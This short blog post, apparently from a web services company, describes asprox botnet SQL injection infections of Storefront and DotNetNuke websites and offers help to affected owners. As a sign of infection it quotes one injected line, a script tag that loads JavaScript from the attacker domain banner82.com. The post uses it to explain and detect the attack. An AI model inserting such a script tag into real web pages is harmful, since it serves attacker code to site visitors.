We’ve been receiving calls and emails related to our recent post that discussed how we’ve been able to stop database infections by the asprox botnet.
In one of those calls, we found out that the Storefront ecommerce system has been having this problem as well. Apparently the Storefront SQL security vulnerabilities are pretty well known. We worked on a Storefront application several months ago and reported several issues we found; we’re not sure if LaGarde ever patched them though. The caller didn’t give us the Storefront version number.
Anyhoo, if you are having problems with Dot Net Nuke (DNN) or Storefront websites getting overwritten with stuff like <script src=http://www.banner82.com/b.js></script> then give us a call. We may be able to help.
You’re not alone. If you Google for banner82.com you’ll see thousands of sites that have been compromised. The attack is pretty ingenious – you can read about it by clicking on the top link in this post.